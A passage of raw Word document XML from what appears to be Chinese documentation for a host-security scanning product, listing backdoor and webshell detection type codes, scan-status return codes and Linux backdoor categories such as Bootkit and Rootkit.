            <w:r>
              <w:t>数据库后门</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="324CB870" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6230B1E0" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0124BA04" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7900E48C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>文件目录管理</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="2FCF48C1" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="444C5D28" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="409E9169" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1E3D46BB" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>特性后门</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="008519B4" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3E26DF44" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="745014A8" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3F3572E2" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>多功能木马</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="14E9AD03" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0D37BA74" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2DF8A020" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3623C281" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>已知后门</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="453DFD78" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="639F1BA9" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="69F51ED9" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7BAD5FB8" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>云引擎检测</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="0FA1417D" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7631C686" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6E99EC07" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>9</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2200B15F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Avira引擎</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="26535E64" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3859FFD3" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6FB809F5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0262E0B6" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>雷火引擎</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="19136FD8" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6758E59D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="586DAD39" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>11</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="029B40D9" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>已知恶意样本</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="59733BEE" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="19B66EFD" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="06CCAF43" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>301</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="756C5E86" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>远程下载</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="61706693" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="34CF000A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="04414CAA" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>401</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5826BEBE" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>混淆加密</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="301BF04B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="603" w:name="_Toc115166374"/>
      <w:bookmarkStart w:id="604" w:name="扫描状态"/>
      <w:bookmarkEnd w:id="602"/>
      <w:r>
        <w:t>扫描状态</w:t>
      </w:r>
      <w:bookmarkEnd w:id="603"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="0020" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="941"/>
        <w:gridCol w:w="1044"/>
        <w:gridCol w:w="1201"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC669E" w14:paraId="57F059A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ADE2D63" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="787FF505" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段内容</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5FE7BAA6" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="525CCA53" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3AAB61D6" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>retcode</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5BD51B3E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>-1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="198304D3" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>无任务</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="1198734E" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4CCAAA6B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>retcode</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="15F8A3AA" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7EAB6D99" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>未开始执行</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="39A6CC0F" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="208C4065" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>retcode</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3F8F19FD" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6FE4DAB2" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>排队执行</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="70486A52" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4EEF3CC8" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>retcode</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4AFB9C9F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="31B4630B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>正在执行</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="646758AD" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2523B703" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>retcode</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6630C53B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="780B4BC9" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>执行成功</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="040F3922" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6BC1CC06" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>retcode</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="04BCE098" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5D00D599" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>执行失败</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="570F8C11" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="605" w:name="_Toc115166375"/>
      <w:bookmarkStart w:id="606" w:name="linux后门类型"/>
      <w:bookmarkEnd w:id="604"/>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>后门类型</w:t>
      </w:r>
      <w:bookmarkEnd w:id="605"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="0020" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1585"/>
        <w:gridCol w:w="1044"/>
        <w:gridCol w:w="1322"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC669E" w14:paraId="378FF921"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0A7D434B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="028B42EE" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段内容</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="33935E28" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="74247DAC" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2955343E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>backDoorType</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="44C1EC6A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>应用后门</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5E9779B2" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>应用后门</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="16ECD99C" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="36F631C9" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>backDoorType</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1DE0C111" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Bootkit</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="525B62DF" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Bootkit</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>后门</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="0DA510D9" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1764EBEC" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>backDoorType</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="15BB83B2" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Rootkit</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="55B7F7AA" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Rootkit后门</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="10841161" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="607" w:name="_Toc115166376"/>
      <w:bookmarkStart w:id="608" w:name="linux后门检查功能"/>
      <w:bookmarkEnd w:id="606"/>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>后门检查功能</w:t>
      </w:r>
      <w:bookmarkEnd w:id="607"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="0020" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2263"/>
        <w:gridCol w:w="2641"/>
        <w:gridCol w:w="630"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC669E" w14:paraId="76DCABD7"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59B60B9" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="24DA72AC" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段内容</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6B6E05AD" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="1EBCAD8A" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0AB949D3" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>backDoorCheckName</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
